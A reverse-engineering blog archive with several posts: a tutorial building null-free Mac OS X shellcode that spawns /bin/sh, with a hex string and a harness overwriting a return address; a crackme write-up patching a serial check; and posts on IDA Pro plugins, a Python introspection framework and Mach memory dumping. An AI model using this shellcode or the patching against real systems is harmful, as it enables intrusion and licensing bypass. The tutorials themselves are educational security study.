Spawning A Shell – Mac OS X Shellcode

Continuing on my foray into the world of reverse engineering and program analysis I have spent sometime lately looking at shellcode.  For the uninitiated, shellcode refers to the small piece code used to exploit a software vulnerability – it got it’s name because it usually spawns a shell for the attacker to use.  In this post I will show you the process of creating shellcode on Mac OS X, so let’s get started!

Before you do anything you need an idea of what you want your shellcode to do.  For this post I have decided to develop the shellcode to spawn a shell in OS X.  Also worth noting is that this shellcode is written in 32-bit x86.

Step 1: Write The Corresponding C Code

When I write shellcode I like to try and write the corresponding C code first.  This may seem like a waste of time because the shellcode should be simple; however, I’ve found it acts as a guide when writing the shellcode because I can read the high-level interpretation quickly and keep track of where I am in the code.

1 #include <unistd.h>
2 #include <stdlib.h>
3
4 int main(int argc, char **argv)
5 {
6 char *execve_argv[2];
7
8 execve_argv[0] = “/bin/sh”;
9 execve_argv[1] = NULL;
10
11 execve(execve_argv[0], execve_argv, NULL);
12 exit(0);
13 }

 

There isn’t much to this program; all it does is call execve() and spawn a shell.  Note that the call to exit() isn’t strictly necessary because execve() will replace the current process image with the new one specified.  With our template code in place it is now time to convert it into assembly.

Step 2: Assembly Code

Our first version will just be a simple translation from the C code into assembly.  The only difference is that,, rather than calling the C library routines we will make direct system calls.  Due to the way Mac OS X is designed the system is vast and complicated with hundreds calls and multiple mechanisms to trap to the kernel; however, for our purpose all we need to know is that the system call number must be placed in %eax, the function arguments are pushed onto the stack in right-to-left order, and the kernel can be entered using the int $0×80 instruction.  Below is the assembly code to spawn a shell.

 

1 .text
2 .globl start
3
4 start:
5 movl    $0x3b, %eax     # SYS_execve
6
7 leal    path, %ebx      # Place address of path in %ebx
8 movl    %ebx, (args)    # Set pointer to path as first element in args
9
10 leal    args, %ecx      # Place address of args in %ecx
11
12 pushl   $0×0            # envp (null)
13 pushl   %ecx            # args
14 pushl   %ebx            # path
15
16 pushl   $0×0            # stack adjustment
17 int     $0×80           # trap
18
19 movl    $0×1, %eax      # SYS_exit
20
21 pushl   $0×0            # exit value
22
23 pushl   $0×0            # stack adjustment
24 int     $0×80           # trap
25
26 .data
27
28 path:   .asciz “/bin/sh”
29
30 args:   .word 0, 0

 

As mentioned above the system call number must be placed in %eax.  In our program this is down on line 5 for the execve() call and on line 19 for the exit() call.  You can obtain these numbers from the file /usr/include/sys/syscall.h on a machine running Mac OS X.  The next trick is to get the proper addresses for the path and argv arguments to execve(), we do this on lines 7-10.  With all of this in place all we need to do is push our arguments and trap to the kernel.  Notice that immediately before trapping we push another value onto the stack.  This is because the interrupt handler in OS X is typically called after a call which pushes the return address for that call onto the stack.  Since we aren’t performing this call we must push a value onto the stack so that our arguments are in the proper place when the interrupt is handled.  Once we finish this for execve() we simply rinse and repeat for exit().

Regarding our .data section we only need entries for our path string and the argv array.  I’ve used the .asciz directive because it saves me having to manually a null byte to our string.  To create the argv array we start by reserving two words of space in which we will copy the address of the path string into the first word and leave the second word set to null.

This code can be compiled and run as follows:

dean@BigBertha:~/shellcode $ as -arch i386 -o execve_simple.o execve_simple.s
dean@BigBertha:~/shellcode $ ld -arch i386 -o execve_simple execve_simple.o
dean@BigBertha:~/shellcode $ ./execve_simple
sh-3.2$ exit
exit
dean@BigBertha:~/shellcode $

Take note of the usage of the -arch i386 option.  This instructs the assembler and linker to use the i386 architecture (calling conventions, register names, available instructions, etc.) as opposed to the default setting on Mac OS X which 64-bit x86.

So, that’s pretty cool! We have successfully written a program in assembly that spawns a shell for us! Now, how to take this code and create proper shellcode?

Step 3: Removing The .data Section

Lets tackle the easy part first and start by removing the .data section from our program.  To do this, yet still have the data available to us, we will move our data onto the stack instead.  This can be done by first writing our string to the stack then doing a little pointer manipulation to setup the argv array.

1 .text
2 .globl start
3
4 start:
5 movl    $0x3b, %eax     # SYS_execve
6
7 pushl   $0x0068732f     # place ‘/bin/sh’ on
8 pushl   $0x6e69622f     # the stack
9 movl    %esp, %ebx      # save pointer to string
10
11 pushl   $0×0            # argv terminating null byte
12 pushl   %ebx            # pointer to path
13 movl    %esp, %ecx      # save pointer to argv
14
15 pushl   $0×0            # envp (null)
16 pushl   %ecx            # argv (on stack)
17 pushl   %ebx            # path (on stack)
18
19 pushl   $0×0            # stack adjustment
20 int     $0×80           # trap
21
22 movl    $0×01, %eax     # SYS_exit
23 pushl   $0×0            # exit return code
24 pushl   $0×0            # stack adjustment
25 int     $0×80           # trap

 

The first thing to notice is that lines 7-8 write the string ‘/bin/sh’ to the stack.  Unfortunately having the string on the stack (and out of a .data section) is only part of the game — we also need a pointer to the string in both the argv array and the first parameter to execve(). To do this, as seen in line 9, we copy the stack pointer (after pushing the string) into another register that we can use later on, effectively getting us a pointer to our string!  Lines 11-13 are similar however they setup the argv array for us instead of pushing a string.  Aside from using different registers the rest of our program is very similar to our original implementation.

Step 4: Removing Null Bytes

At this point things become a little tedious as we must remove all null bytes from our code.  The reason for this is that shellcode is frequently injected as a string so any null byte would signal the (incorrect) end of the string.

To find the null bytes what you can do is first compile the program, then use otool to look for any null bytes in the .text section.  For example, we get the following with our previous code sample.

dean@BigBertha:~/shellcode $ otool -t execve_no_data
execve_no_data:
(__TEXT,__text) section
00001f84 b8 3b 00 00 00 68 2f 73 68 00 68 2f 62 69 6e 89
00001f94 e3 6a 00 53 89 e1 6a 00 51 53 6a 00 cd 80 b8 01
00001fa4 00 00 00 6a 00 6a 00 cd 80

Here we see that there are three consecutive null bytes beginning at the address 0x1f86 which correspond to the move of line 5 in our last code sample.  To get rid of these null bytes we can begin by clearing $eax to 0 using XOR and then copying 0x3b into the low byte of the register (lines 14-15 below).  Rather than going through each null byte I’ll leave that as a bit of fun for you :)  Once you’ve made all the changes you should end up with code that looks something like the following program.

1 /* Shellcode to spawn a shell on OS X.  We can’t use the ‘traditional’
* technique of addressing relative to a call site in the .text because
* OS X is smart enough to know that it should not allow code to be modified
* in that section.
*
* Our new technique is to place all the data on the stack and manipulate it
* there then simply reading from the stack.
*/
9
10 .text
11 .globl start
12
13 start:
14 xorl    %eax, %eax      # clear %eax
15 movb    $0x3b, %al      # SYS_execve
16
17 xorl    %edx, %edx
18 movl    $0x68732f01, %edx
19 shrl    $0×08, %edx
20
21 pushl   %edx
22 pushl   $0x6e69622f
23 movl    %esp, %ebx
24
25 xorl    %edx, %edx
26
27 pushl   %edx
28 pushl   %ebx
29 movl    %esp, %ecx
30
31 pushl   %edx            # envp (null)
32 pushl   %ecx            # argv (on stack)
33 pushl   %ebx            # path (on stack)
34
35 pushl   %edx
36 int     $0×80
37
38 movb    $0×01, %al      # SYS_exit
39 pushl   %edx            # exit return code
40 pushl   %edx            # stack adjustment
41 int     $0×80

 

As usual you can compile and test this to make sure it still works as intended.

Step 5: Testing Our Code

For this last part we want to see our code in action, being executed on the stack of a simple program.  Our test program is as follows:

1   #include <stdlib.h>

2

3   char *sc = “\x31\xc0\xb0\x3b\x31\xd2\xba\x01\x2f\x73\x68\xc1\xea\x08\x52\x68″

4              “\x2f\x62\x69\x6e\x89\xe3\x31\xd2\x52\x53\x89\xe1\x52\x51\x53\x52″

5              “\xcd\x80\xb0\x01\x52\x52\xcd\x80″;

6

7   int main(int argc, char **argv)

8   {

9     int *mret;

10    mret = (int *)&mret + atoi(argv[1]);

11    *mret = (int)sc;

12  }

 

Lines 3-5 of this code contains our shellcode, it’s just written in hex rather than human-readable mnemonics.  The rest of program just creates a variable on the stack, gets the address of that variable, adds it with a supplied offset, and then copies the address of our shellcode into (hopefully) the location typically used to store the return address.  By placing the address of our shellcode here upon return of main() our code should be executed and resulting in a shell being spawned.

My First Crackme!

I finally got around to trying to solve a crackme for OS X this morning and it was a blast!  For those who are interested the crackme can be found on this site (MSJ2009#1.zip).  The goal of the crackme (not surprisingly) is to successfully register the application using either a hex edit, serial sniff, or keygen.

Step 1: Recon!

Before I even ran the application I went and dug around int he application package contents.  I didn’t find anything all that interesting there so it was time to dig a little deeper.  To do this I decided to see what symbols were in the binary using the nm tool.

dean@Atlantis:~/Dropbox/Crackmes/MSJ 2009/Challenge #1.app/Contents/MacOS $ nm Challenge\ #1

Challenge #1 (for architecture i386):
0000251e t -[Level1 applicationDidFinishLaunching:]
00002a94 t -[Level1 applicationShouldTerminateAfterLastWindowClosed:]
00002433 t -[Level1 awakeFromNib]
000026d6 t -[Level1 cancelButton:]
000025ac t -[Level1 continueWelcomeButton:]
000027e3 t -[Level1 emailResults:]
00002a88 t -[Level1 isRegistered]
0000264e t -[Level1 okErrorSheetButton:]
00002692 t -[Level1 okIncorrectSerialButton:]
000025f0 t -[Level1 quitCorrectSerialButton:]
000026f7 t -[Level1 unregisterButton:]
00002a9e t -[Level1 validateSerial:forName:]
0000288e t -[Level1 verifyRegistration:]
...

Great! There is a function just for validation, now all we need to do is to get that to say we’ve passed in valid credentials.

Step 2: Validation

The first step I took in manipulating the validation function is to see what types the function expected.  You can get this information using otool as follows.

dean@Atlantis:~/Dropbox/Crackmes/MSJ 2009/Challenge #1.app/Contents/MacOS $ otool -Vo Challenge\ #1...	method_name 0x00002d7d validateSerial:forName:	method_types 0x00002cb6 c16@0:4@8@12	method_imp 0x00002a9e -[Level1 validateSerial:forName:]...

From this we know that the function expects two objects as arguments and it returns a char indicating whether or not the credentials have been successfully verified.  The next step is to see what the heck this function is doing.  Once again we use otool to disassemble the binary.  In order to save space I’ve only included the parts relevant to this crack.

dean@Atlantis:~/Dropbox/Crackmes/MSJ 2009/Challenge #1.app/Contents/MacOS $ otool -Vt Challenge\ #1...-[Level1 validateSerial:forName:]:
00002a9e        pushl   %ebp
00002a9f        movl    %esp,%ebp
00002aa1        pushl   %edi
00002aa2        pushl   %esi
00002aa3        pushl   %ebx
00002aa4        subl    $0x3c,%esp
00002aa7        movl    0x00004040,%eax
00002aac        movl    %eax,0x04(%esp)
00002ab0        movl    0x10(%ebp),%eax
00002ab3        movl    %eax,(%esp)
00002ab6        calll   0x0000505e      ; symbol stub for: _objc_msgSend
00002abb        cmpl    $0x08,%eax
00002abe        jne     0x00002c4e...00002c4e        xorl    %edx,%edx
00002c50        addl    $0x3c,%esp
00002c53        movl    %edx,%eax
00002c55        popl    %ebx
00002c56        popl    %esi
00002c57        popl    %edi
00002c58        leave
00002c59        ret

We see that this function begins as expected with setting up the stack, saving registers it will trash, and allocating space for local variables.  The next point of interest is the call to objc_msgSend.  This functions takes a variable number of arguments the first of which is the object to send a message too and the second of which is the message to be sent.  All remaining arguments to objc_msgSend are passed arguments for the message to the receiver.  If you were to set a breakpoint at the beginning of the validate function and run the program in gdb you can find out (by inspecting the memory) that the message being sent is the length message.  We can also see that the receiving object is the first parameter (serial number) to the validation function.  The next thing to notice is that if the length of the serial number is not eight characters then the function would return.  We can leverage the reliance on the serial number string length and the immediate return to cause the function to always return true regardless which serial number is entered.

Step 3: Hex Edit

For the sake of simplicity I decided to solve this crackme using a simple hex edit.  In order to do this successfully all we need to know is (1) where to make the change and (2) what to change the code too.  The standard calling convention on x86 (32-bit) mandates that return values from a function be placed in %eax, therefore our goal is to modify the value of %eax just before the validate function exits.  To do this I chose to change the xorl at address 0x2c4e to a movl instruction that placed a 0×1 in %edx.  You can make this change by opening the binary in your favourite hex editor and then changing the bytes at 0x2c4e to ba01000000.  Be sure to shift the remaining bytes in the function over to make space for the additional bytes.  Assuming the changes were made properly the next time you run the program it should register your serial number without a problem.

 

A Week With IDA

Currently I am working on two projects, intropy and ICE, that involve the popular disassembler IDA Pro.  With the deadline for the annual IDA Pro plugin contest just around the corner I thought this was a great time to dig deep into IDA and see what I can do.  This post serves as a summary of my experiences and reactions using IDA Pro as well as some of the other technologies I tried to integrate over the past week or so.

The Goal: RECoop

Despite my best efforts I am not a reverse engineer, I continue to be fascinated trying to pull software apart to understand how it works but at this point I’m far from what I’d call a reverse engineer.  That being said when I began trying to think of ideas for a plugin that I could conceivably write in a week and still be useful I looked to other aspects of computing.  After tossing out a few other ideas I began to think more about how I’d like to become more proficient in the art of reverse engineering but at times find the lack of guidance to be somewhat discouraging.  I then began to think about how cool it would be if I could sit down at my computer, open up IDA Pro, and have a mentor help guide me through some exercises.  With that the idea for RECoop was born.

The main idea behind RECoop (Cooperative Reverse Engineering) is that currently the task of reverse engineering is performed largely in solitude and that I believe a single person would go insane trying to reverse some of the larger pieces of software out there.  Therefore what we need a way for reverse engineers to work on the same project — concurrently and in real-time.  I planned to achieve this by writing a plugin for IDA Pro that brought the communication facilities provided by Skype together with the massively scalable data storage systems provided by the Amazon Web Services.  With RECoop I envision a team of reverse engineers all working together to understand a single piece of software and hope that as a result there will be both a savings in time as well as a better understanding of the software in question.  Lastly, two environments that I think would benefit from RECoop immensely are in the (virtual) classroom and globally distributed teams of engineers.

IDA Pro And The SDK

Rather than immediately trying to reverse engineer the ubiquitous calculator application like I’m sure most new comers to IDA Pro do, I dove straight into the SDK and explored IDA Pro through the eyes of someone trying to bring new functionality to the disassembler.

Hex Rays has made two interfaces to the IDA Pro SDK available to developers.  The primary interface is written in C++ and allows developers to integrate deeply with IDA Pro — creating plugins, processor modules, file loaders, and much more.  The secondary interface is provided by a (now standard) plugin called IDAPython which, not surprisingly, provides a Python interface to the SDK.  Both the C++ and Python interface are largely the same unfortunately I have yet to dive deep into the Python interface so I am not certain what the limitations are.

Upon downloading and unpacking the SDK I first took a look at some of the header files that are available.  The first thing that stood out to me was that the header files are extremely well documented.  All functions that Hex Rays intends to be used are marked with the ida_export qualifier and have a description of the function along with its inputs and outputs.  Although have been useful to have a nice web-interface to search the API it is quite easy to grep through the header files and discover what is available to use.  Another observation that I made was that the API is quite modular and the division of functionality into header files seemed quite logical.  After rooting around the headers a bit I tried to build the SDK.

According to the documentation, building the SDK should be a simple matter of defining a couple environment variables and then running the make utility.  Unfortunately it was not quite that simple and required me to make a few modifications to the Makefiles.  Note that I was building the SDK on Mac OS X 10.6 and from the Makefiles included it appears that Hex Rays has been testing against Mac OS X 10.5 so most of the changes were just to update some of the paths and include files to reflect OS X 10.6.  Once these changes were made the SDK built with no issues.

To develop RECoop I needed two things from the SDK: the ability to create interface components in IDA Pro, and the ability to integrate with the IDA Pro database used to store information about the current binary being analyzed.  As of IDA Pro 6.0 Hex Rays transitioned the IDA Pro interface to the platform independent application framework Qt.  Rather than exposing the entire Qt framework Hex Rays has opted to provide a small subset of GUI functions that they feel will suit the vast majority of plugins.  With this subset it is possible to create some basic dialogs, create and manipulate control-flow graphs, create forms (IDA’s version of sub-windows), annotate existing disassembly views, and a few other things.  While I agree this is likely enough support for most, it was not enough for RECoop and I had to build and integrate the full Qt framework.  Hex Rays made (in my opinion) a number of smart choices in designing the API, one of which is the notifications to alert plugins of events in various components of IDA Pro such as the UI and database.  Not only did they adopt a notification-based system, they have allowed developers to hook into these notifications and perform actions when they occur.  This feature alone is largely what makes a plugin like RECoop possible.

Plugins in IDA Pro are compiled as dynamic libraries presumably to leverage some of the code loading facilities provided by the underlying operating system.  In addition each plugin must export a special structure that tells IDA Pro what the initialization, termination, and run functions of the plugin are along with various pieces of metadata such as plugin descriptions and preferred keyboard shortcuts.

Perhaps surprisingly (I was surprised), IDA Pro is a single threaded application.  I’m not entirely certain why that is the case however I speculate that it would simplify the operations associated with analyzing the binary and retrieving/storing data in the database.  Regardless, this means that all plugins must run on the main thread and can cause the UI to lock up.  I suppose for the vast majority of plugins this isn’t a major issue, but for RECoop it quickly presented a number of challenges.  In addition, any operation that manipulates the UI drawing context must be called on the main thread.  This too raised some issues in the development of RECoop.

Skype

At the beginning of this project I was actually completely uncertain as to whether or not integrating with Skype is even possible.  It turns out that the fine folks at Skype thought of people like me and have made a product called SkypeKit available.  SkypeKit enables developers to integrate Skype into their products and provide the same powerful real-time communications offered by the official Skype application.  To make this work the folks at Skype took the approach of splitting the platform in to two parts: a runtime and the SDK.  The SkypeKit runtime is essentially a headless Skype client.  Through the SDK you can interact with the runtime and perform actions such as placing and receiving calls (video and audio), manage your Skype contacts, dial out of the Skype network to the phone network, and much more.  The SkypeKit runtime is run as a daemon and as a result the SDK interacts with it through the IPC facilities provided by the OS.  Due in part to this separation, SkypeKit takes a unique approach to communication based on asynchronous actions and the use of notifications.

During the login process a developer using SkypeKit must authenticate with Skype and create an Account object.  To do this you call a series of functions on the main Skype object to acquire the account information and then call a login function.  Once this has been done the created Account object is then notified once it has been logged in.  The process is fairly straightforward and outlined in a number of SkypeKit tutorials; however, when integrating this process with IDA Pro it was found that the main IDA thread would block waiting for a response from Skype and in turn the response it was expecting would never be received because of the blocking.  This problem was easily rectified by introducing a second thread to handle communication with Skype.  Unfortunately this solution has two disadvantages: all UI calls must be somehow moved to the main thread, and it is unclear whether or not the introduction of additional threads has any adverse effects on IDA Pro.  In addition to this I also ran into some minor issues with how the Skype SDK handles subclassing of the provided objects.

Qt

As with most things in this project I have never used Qt in the past and was pleasantly surprised once I began to use it.  As previously noted IDA Pro 6.0 and up are all based on a platform independent interface developed using Qt.  In order to provide some of the functionality needed for the plugin it is necessary to go above and beyond the UI support provided by the IDA Pro SDK and this can be done by leveraging the full Qt framework.  The Qt framework itself is extremely well documented and provides facilities for UI elements and widgets, thread and process management, and much more.  In addition to a large amount of functionality the Qt developers also introduce one technique, signals and slots, for communication that I found rather intriguing.

The idea behind signals and slots is that the relationship between UI elements is both hierarchical in terms of widget parent-child relationships but also functional in that text from a text input widget may be used in multiple other widgets.  To support this functional relationship Qt introduced the idea signals, which are emitted as certain events occur, and slots, which can be executed when the containing object receives a specified signal.  This functionality is outside the scope of standard C++ constructs and therefore requires the use of the Qt meta-object compiler during the build phase to generate the necessary code.  In the context of RECoop signals and slots enable the cross-thread communication required to keep all drawing operations on the main thread.  Lastly note that it is possible (and quite useful) to add custom signals and slots to non-Qt objects.  For example, when a user types a chat message in RECoop a signal is emitted that causes Skype to send the message over the network.

Amazon Web Services

To provide the database backend required by RECoop I decided to go with Amazon SimpleDB and a server implemented in Erlang running in an Amazon EC2 instance.  The decision to go with Amazon Web Services was guided by a number of factors.  First, this meant I didn’t have to provide my own servers for the project.  Although I could have hosted the service on this site I wanted to decouple the service from my own site in order to encourage private installs and alleviate me from managing more stuff.  Second, Amazon SimpleDB boasts the ability to provide highly scalable database solutions that are capable of handling large numbers of concurrent connections.  Since the idea is to have many people using the same database at once in RECoop this seemed like a natural fit.  Finally, I had never used the Amazon Web Services so this seemed a good opportunity to check them out.

Erlang was selected for implementing the RECoop server because it provides exceptional facilities for handling concurrent connections, is extremely expressive and compact, and has facilities for quickly packing and unpacking binary data.  Since this component of RECoop is still largely unimplemented I will save a discussion of it for a future post.

Wrap Up

For most the first week with IDA Pro is probably filled with analyzing countless lines of assembly code, staring blankly at instruction set references, and banging your head against the wall trying to wrap it around the low-level aspects of computers.  For me it was an exploration of multiple SDKs; insights into API design, programming language constructs, and proper documentation; and a chance to explore several different technologies with the goal of integrating them to try and foster collaboration among reverse engineers.

Basic Memory Manipulation With intropy

About a month and a half ago I wrote a post about dumping memory on Mac OS X which was followed by a post introducing intropy, a Python framework I’m developing that enables you to effortlessly analyze software.  In this post I am going to demonstrate some of the power of (a very early implementation of) intropy by taking you through a script that writes some bytes to memory in another process then reads them back.

Below is the complete code to spawn a new process, execute a command, write a block of data into the new process, and then read that data back into our process.  You’ll notice that compared to my description of how to dump memory on Mac OS X this Python script is a lot less scary.  One thing that I really like about intropy is that you don’t need to understand the details of how a call to task_for_pid() or mach_vm_read() works, all you need to do is describe what you want to accomplish and get it done.

      1 """
      2     Module: mem
      3     Author: Dean Pucsek <dean@lightbulbone.com>
      4     Date: June 2011
      5
      6     Copyright (C) 2011 Dean Pucsek.  All rights reserved.
      7
      8     Write a set of bytes to memory then read them back.
      9 """
     10
     11 import idb
     12
     13 def main():
     14     addr = 0x100001000
     15     sz = 0x10
     16
     17     payload =  "\x41\x42\x43\x44"
     18     payload += "\x45\x46\x47\x48"
     19     payload += "\x49\x4a\x4b\x4c"
     20     payload += "\x4d\x4e\x4f\x50"
     21
     22     dbg = idb.idb()
     23     ts = dbg.spawn("sleep 90")
     24
     25     dbg.memwrite(ts, addr, payload)
     26
     27     buf = dbg.memread(ts, addr, sz)
     28
     29     for i in range(0,sz):
     30         print hex(ord(buf.raw[i])),
     31
     32     print ' '
     33
     34 if __name__ == "__main__":
     35     main()

While I’m sure you can figure out what each line does, especially if you are familiar with Python, lets step through some of the more interesting bits.

Line 11

This line simply imports the idb module of intropy.  Note that as of writing this post I still have yet to publicly release the intropy code base so you’ll have to wait before you can try this out yourself.

Lines 14-20

These lines initialize some of the data we need for the read and write.  The variable names and contents should speak for themselves, but if you’r curious the payload is nothing more than the ABC’s!

Line 22

Here we are initializing our dbg variable with a new instance of the idb class.  If you’re not familiar with Python classes and instantiation I highly recommend you check out the documentation.

Line 23

Rather than attach ourselves to an existing process we have decided to spawn a new one.  The spawn() method takes care of forking, executing, and attaching a new process to our session.  It returns an object known as a task_struct in intropy which contains various pieces of information about the process and resources it is associated with.  In intropy you should never need to directly access this structure.  The reason it is returned is so that other functions can make use of it.  In future versions the task_struct will likely not be exposed.

Line 25

Write to memory! Yep, it’s a one liner, were you hoping for more?  This line will attempt to copy the payload into the specified location of the spawned process.  In order for this to be successful the destination address must be writable.

Line 27

Read sz bytes starting at addr in the spawned process!  Aren’t one liners awesome? This call returns a buffer that contains the data read which is implemented using a Python ctypes array (hence the funky printing on lines 29-32).  In a future revision of intropy I may have this function return a Python string instead in order to increase the amount of existing code that can be used to analyze the returned data.

That, my friends, is how you write and read memory in intropy.  Although this example is quite simple it definitely shows how powerful intropy can be in terms of reduced coding, more descriptive code, and portability.

intropy: Program Introspection Using Python

About two months ago I bought two books on Amazon, “The Mac Hackers Handbook” and “Gray Hat Python”, with the goal of being able to further explore my curiosity in reverse engineering using Mac OS X as a case study.  The books are interesting in that Gray Hat Python essentially makes the argument that Python is a great language for reverse engineering and The Mac Hackers Handbook shows you some of the basic tools and techniques needed for vulnerability detection, exploit development, and reliable deployment.  One interesting commonality between the two books is that they both leverage the PaiMei (http://code.google.com/p/paimei/) framework by Pedram Amini, a reverse engineering framework written in Python.

While both books claim the framework is extremely powerful I was largely unsuccessful in getting it up and running (on a Mac) because it was originally developed for Windows.  I also found some of the prerequisites somewhat ridiculous (case in point: it wanted MySQL which boggled my mind when much lighter alternatives are available).  So as you’d expect from me, I saw this as a challenge: develop a cross-platform reverse engineering framework that doesn’t require the kitchen sink to run.  My answer to that challenge is intropy — a Python framework for program introspection.

An Overview Of intropy

intropy Schematic

Figure 1: Schematic of the intropy framework.  Arrows represent the direction of information flow.

The current (partial) implementation of intropy is entirely in Python and C.  Python is used as the primary language with C only being used to build the abstraction layer between the operating system and the rest of the framework.  As shown in Figure 1 intropy consists of three main components: libicc, idb, and idc.

libicc

One of the primary goals of intropy is to be platform agnostic.  In order to accomplish this I have decided to develop an underlying library that abstracts the OS into a generic API.  The library, libicc, is written purely in C and is brought into the Python environment using the Python ctypes module.  Currently libicc has only been implemented for Mac OS X using a mix of the POSIX and Mach API’s.  As a result, the interface provided by libicc has a very Mach-ish feel to it; however, I don’t see that as being an issue because the API still follows common OS abstractions such as process, threads, and virtual memory.

idb

The sole user of libicc is idb, the intelligent debugger.   Written entirely in Python, idb enables reverse engineers to create their own modules that leverage basic debugging constructs such as stepping, creating breakpoints, and inspecting portions of memory.  The “intelligent” aspect of the debugger comes from the fact that, unlike traditional debuggers, it is possible to write Python scripts that can leverage the facilities provided by idb.  For example, the console shown in Figure 1 is written entirely as a module on top of idb.  Rather than bloating this post I will be writing another post solely about the design of idb and show some examples of writing modules with it.

idc

While the facilities provided by idb enable you to script the debugger, they do not allow you to inspect the binary at the basic block level.  For this I am planning on leveraging the power of IDA Pro and providing an interface in intropy to do more fine-grained analysis.  This component, idc, is still in the design phase and therefore I’ll leave a more complete discussion for a future post.

intropy Modules

Modules in intropy are written in Python allowing you to leverage the ease of development, functionality, and reliability of the Python language as well as the huge number of Python modules already written.  One interesting point about intropy is that everything written using idb and idc, including the console, is a module.  By doing this we enforce good software design, give everyone access to the same API, and allow for a greater level of flexibility.  On that note, another goal of intropy is to provide the foundation reverse engineers need to create a system that works for them.  Once the source code for intropy is available I will make the API available.

Next Steps

There is lots to be done before intropy is ready for prime time.  As mentioned earlier, currently there is only a partial implementation so the obvious first step is to complete the coding.  In addition, the current console implementation is lacking greatly in its ability to manage modules so I will also be working on a console design that enables users to load/unload, configure, and execute analysis modules.  Moreover, there is still a great deal of work to be done on design and implementation of idc.  Finally, once enough of the system has been created I will be posting the code to my site on Github.

A Final Note

Needless to say, I am really excited about the prospects for intropy.  Through intropy I hope to inspire other developers to look at their software through the eyes of both an engineer and a reverse engineer and in doing so make some impact (however small it may be) in the software landscape.

From Hawaii to Montreal

For about the past two weeks I’ve been in between Hawaii and Montreal to present at my first workshops.  Needless to say, I definitely learned a lot at both venues and am extremely excited to see where my research takes me next.

In Hawaii (Honolulu to be exact) I presented a poster that outlined my teams proposal for a binary analysis framework targeted at program comprehension.  It was presented at the 1st Workshop on Developing Tools as Plug-Ins (TOPI) which is a new workshop being offered in conjunction with ICSE.  The poster session was a complete success; we got lots of feedback and most people I talked too where interested in hearing more about the project.  In addition to the poster session I also found the talks quite interesting, especially the keynote that covered some of the issues associated with using plug-ins and how plug-ins have evolved over the years.

After TOPI I headed back to Victoria for a couple days before setting off for another workshop in Montreal.  In Montreal, Concordia was hosting the NSERC Workshop on Malware Analysis and Fingerprinting which, thanks to my fearless supervisor, I was able to attend.  At this workshop we presented our work on the ICE framework since our submission to TOPI in January.  Since the ICE framework is targeted at binary analysis it was interesting to hear what malware analysts thought of our plan.  Thankfully ICE was quite well received and we got the feeling that we were definitely on the right track.  Aside from our involvement I also really enjoyed the talks in particular those given by representatives from Arbor Networks, GFI, and Google.  In general I was quite impressed with the people I met from Concordia and am definitely going to look into doing some kind of exchange in the future.

I’ll leave this post here for now, but stay tuned for an introduction to ICE!

My mind is being blown!

Lately I’ve been helping my brother and a friend of his develop a web site, outbounce.com, which makes it easier to plan social events and discover other events nearby.  With our initial site implementation in a code freeze I decided to finally take a look at how we could go about bringing our idea to mobile platforms.  It was (not surprisingly) quickly apparent that we’d need some kind of an RPC server in order to handle requests from mobile clients so I started looking at that.

Originally I started looking at Scala (http://www.scala-lang.org/) because I was intrigued by the actor model and the general approach to concurrency.  I actually got as far as partially implementing an RPC server but I became increasingly frustrated by the fact that Scala leverages large chunks of Java (including the JVM itself).  The issue wasn’t one of performance or anything technical, it was simply that I am not familiar enough with the Java libraries and I was getting annoyed with trying to dig through both the Scala documentation and Java documentation to find a function.  That being said I scraped my Scala implementation and decided to look elsewhere.

Still intrigued by the actor model I decided to go to the language that introduced it, Erlang, and needless to say my mind has been blown!

I actually first encountered Erlang four or five years ago before I had had much exposure to programming in general.  In my journeys since then I’ve encountered many languages including (but definitely not limited to): PHP, Python, C, Haskell, Prolog, several variants of assembly, Objective-C, and a few Microsoft languages.  As a result returning to Erlang has been eye opening.  The reason? It pulls ideas from all of these different languages and was originally based on Prolog.  Rather than hastily putting together some examples of this I am instead going to try my best to document some of the similarities as I move forward in my RPC implementation.

Dumping process memory on Mac OS X

A little while ago I was trying to setup Pai Mei (http://code.google.com/p/paimei/) on Mac OS X and wasn’t having much luck.  This didn’t really surprise me since it wasn’t designed for OS X, but it was worth a shot!  Aside from having issues setting it up I found the requirement to run a MySQL server kind of ridiculous when solutions such as SQLite exist.  Given all of this and my desire to try and peer into parts of software I’m probably not supposed to see, I decided to try my hand at writing a program that can track the execution of other processes (more on this in a future post).  The first step to doing any of this is being able to monitor and manipulate a process and I thought a fun way of doing that would be to try and dump the memory from one process to a file.

Mach Tasks

XNU, the kernel used in Mac OS  X, is built up of three main components: Mach, BSD, and I/O Kit.  Each component provides different services to the system however for this post we are most interested in Mach.  Mach was originally developed at Carnegie Mellon University as a simple and extendable microkernel and provides XNU several key abstractions including tasks, threads, address spaces, and ports.

A Mach task is an abstraction that contains one or more threads, a virtual address space, and ports among other things.  Mach tasks in turn serve as the basis of the familiar process model which is implemented in the BSD component of XNU.  As a result, Mach tasks are fundamental units in the XNU kernel and are central to dumping memory of a process.

Getting the Mach task: task_for_pid()

Since Mac OS X implements the POSIX API, provided by the BSD component of XNU, our first step in our quest to dump memory is to translate a process ID into a Mach task identifier.  Our job is made somewhat easy by the task_for_pid() function in mach/mach_traps.h as seen in the following block of code.

  kern_return_t ret = -1;
  mach_port_name_t tport = -1;
  int tpid = -1;

  tpid = fork_calculator();

  ret = task_for_pid(mach_task_self(), tpid, &tport);
  if(ret != KERN_SUCCESS) {
    fprintf(stderr, "main: failed to get task for pid %d (%d)\n", tpid, ret);
    return -1;
  }

The function fork_calculator() spawns a new process running the Mac OS X Calculator application and returns the process ID of the new process.  The call to task_for_pid() takes three arguments: an identifier for the current task, the target process ID, and a pointer to a location to store a port for communicating with the target process.  While this code looks simple there are a couple caveats that you must be aware of.  First, the introduction of Kernel Authorization in Mac OS X 10.4 requires the process requesting the task identifier to be properly authenticated.  You can achieve this by either implementing the required authentication in code (not shown here) or running the dumping tool as root.  Secondly, the process being targeted must be a child process of the dumping tool.  This is why our code forks a target process rather than simply accepting a process ID as an argument.  For a more in depth explanation of the required permissions see the comments for task_for_pid() in the XNU source code.

Reading memory: mach_vm_read()

Now that we have a port for the target process we can proceed to step two in our quest to dump memory: reading memory from the target process.  This is accomplished using the function mach_vm_read() which will copy the specified region of memory from the target process into the calling process.  The following block of code shows how to use mach_vm_read().

  kern_return_t ret = 0;
  pointer_t data;
  mach_msg_type_number_t data_size;

  long dump_base_addr = 0x10000190c;
  long dump_size = 0x1000;

  ret = mach_vm_read(tport, dump_base_addr, dump_size, &data, &data_size);
  if(ret != KERN_SUCCESS) {
